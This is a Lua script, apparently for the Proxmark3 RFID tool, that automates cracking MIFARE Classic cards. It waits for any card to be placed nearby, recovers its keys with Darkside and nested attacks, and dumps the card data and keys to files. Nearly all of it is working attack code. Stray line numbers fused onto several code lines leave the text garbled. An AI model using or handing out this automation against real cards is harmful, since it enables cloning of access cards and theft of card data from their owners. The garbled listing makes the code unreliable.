1local getopt = require('getopt')
2local reader = require('read14a')
3local cmds = require('commands')
4
-- File-level globals read by help(): the one-line usage example, the
-- author credit and the long description that is printed as help text.
example = 'script run mifare_autopwn'
author = 'Martin Holst Swende'


-- Level-2 long bracket so the text itself may contain "]]" later on;
-- the first newline after the opening bracket is skipped by Lua.
desc = [==[
This is a script which automates cracking and dumping mifare classic cards. It sets itself into
'listening'-mode, after which it cracks and dumps any mifare classic card that you
place by the device.

Arguments:
 -d debug logging on
 -h this help

Output files from this operation:
 <uid>.eml - emulator file
 <uid>.html - html file containing card data
 dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
 dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.

]==]
26
27-------------------------------
28-- Some utilities
29-------------------------------
-- Verbose-logging switch consulted by dbg(). It is a file-scope local, so
-- the `DEBUG = true` in main() (the -d option) updates this upvalue.
local DEBUG = false
---
-- Debug printout: writes the single value `args` prefixed with ":: "
-- when DEBUG is set and does nothing otherwise.
-- @param args value to print (anything print() accepts)
function dbg(args)
    if not DEBUG then
        return
    end
    print(":: ", args)
end
---
-- Error reporting helper: prints the message and hands back the
-- conventional (nil, err) pair so callers can write `return oops(err)`.
-- @param err error message (anything print() accepts)
-- @return nil, err
function oops(err)
    print("ERROR: ", err)
    local result, message = nil, err
    return result, message
end
44
---
-- Usage help: prints the long description, a heading and the example
-- invocation, in that order. Reads the file-level globals `desc` and
-- `example`.
function help()
    local lines = { desc, "Example usage", example }
    -- numeric loop (not ipairs) so a missing global still prints as "nil",
    -- exactly like three separate print() calls would
    for i = 1, 3 do
        print(lines[i])
    end
end
52
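---
-- Waits for a MIFARE (ISO14443-A) card to be placed within the vicinity of
-- the reader, polling until a card answers or a key is pressed.
-- @return if successful: a table with the card info as returned by
--         reader.read1443a (callers use its .uid and .sak fields)
-- @return if unsuccessful: nil, "Aborted by user"
function wait_for_mifare()
    while not core.ukbhit() do
        -- `card` used to be an accidental global (`res, err = ...`); keeping
        -- it local stops a stale card table / error string from leaking into
        -- the global scope. The second return value of read1443a only says
        -- that no card answered this poll, so it is deliberately dropped.
        local card = reader.read1443a(false, true)
        if card then
            return card
        end
    end
    return nil, "Aborted by user"
end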
65
---
-- Runs the nested attack seeded with one known key A for block 0 and lets
-- the client write the recovered keys out (the trailing `d` flag). The
-- card-memory argument of `hf mf nested` is derived from the SAK byte.
-- @param key 12-hex-digit key A for block 0; it is interpolated verbatim
--            into a console command, so callers must pass the hex string
--            produced by bin.unpack and nothing user-controlled
-- @param sak select-acknowledge byte of the card
function nested(key, sak)
    -- SAK -> card-memory argument of `hf mf nested`
    local memory_by_sak = {
        [0x18] = 4, -- NXP MIFARE Classic 4k | Plus 4k
        [0x08] = 1, -- NXP MIFARE Classic 1k | Plus 2k
        [0x09] = 0, -- NXP MIFARE Mini 0.3k
        [0x10] = 2, -- NXP MIFARE Plus 2k
        [0x01] = 1, -- NXP MIFARE TNP3xxx 1K
    }
    local memory = memory_by_sak[sak]
    if memory == nil then
        print("I don't know how many sectors there are on this type of card, defaulting to 16")
        memory = 1
    end
    core.console(("hf mf nested %d 0 A %s d"):format(memory, key))
end
84
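---
-- Runs a helper script by module name, forcing it to execute again even if
-- it has already been loaded. `require` caches in package.loaded and runs a
-- module body only once, so without evicting the entry the second card that
-- main() loops over would silently get no html/eml files.
-- @param name module name as passed to require
local function rerun_script(name)
    package.loaded[name] = nil
    return require(name)
end

---
-- Dumps the card whose keys were just recovered: runs `hf mf dump`, then
-- renders the dump as <uid>.html via the htmldump script and as an
-- emulator file via the dumptoemul script.
-- @param uid UID of the card as a hex string; it is used verbatim as the
--            html output filename, so it must not contain path characters
--            (read14a is expected to hand back plain hex — confirm there)
function dump(uid)
    core.console("hf mf dump")
    -- The helper scripts read their command line from the global `args`;
    -- stash ours and restore it afterwards.
    local myargs = args
    args = ("-o %s.html"):format(uid)
    rerun_script('../scripts/htmldump')
    -- dumptoemul takes no options here; it uses its default output name
    args = ""
    rerun_script('../scripts/dumptoemul')
    args = myargs
end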
100
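---
-- The main entry point: parses the options, then loops waiting for cards.
-- Each card not seen before is attacked with Darkside (one key A for
-- block 0), then nested (the remaining keys), then dumped. The loop only
-- ends when a wait is aborted by the user or a Darkside attempt fails, so a
-- card that resists Darkside ends the whole script rather than being skipped.
-- @param args option string handed to the script by the client ("-h", "-d")
function main(args)
    local seen_uids = {}

    -- Read the parameters
    for o, _ in getopt.getopt(args, 'hd') do
        if o == "h" then help() return end
        if o == "d" then DEBUG = true end
    end

    while true do
        local res, err = wait_for_mifare()
        if err then return oops(err) end
        local uid, sak = res.uid, res.sak
        -- Seen already? The reader keeps answering while the same card sits
        -- on it, so skip anything already cracked.
        if not seen_uids[uid] then
            seen_uids[uid] = uid
            print("Card found, commencing crack", uid)
            -- Crack it
            err, res = core.mfDarkside()
            if err == -1 then return oops("Button pressed. Aborted.")
            elseif err == -2 then return oops("Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests).")
            elseif err == -3 then return oops("Card is not vulnerable to Darkside attack (its random number generator is not predictable).")
            elseif err == -4 then return oops([[
Card is not vulnerable to Darkside attack (its random number generator seems to be based on the wellknown
generating polynomial with 16 effective bits only, but shows unexpected behaviour.]])
            elseif err == -5 then return oops("Aborted via keyboard.")
            elseif not res then
                -- Any other failure mode leaves no key blob to unpack;
                -- report it instead of letting bin.unpack(nil) raise.
                return oops(("Darkside attack returned no key (code %s)."):format(tostring(err)))
            end
            -- The key is actually 8 bytes, so a 6-byte key is sent as
            -- 00XXXXXX. bin.unpack returns the next position first, then
            -- the two padding bytes, then the six bytes of actual key data;
            -- only the last value is needed.
            local _, _, key = bin.unpack("H2H6", res)
            print("Key ", key)

            -- Use nested attack to recover the remaining sector keys
            nested(key, sak)
            -- Dump info
            dump(uid)
        end
    end
end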
151
-- Call the main with the option string the client puts in the global `args`
main(args)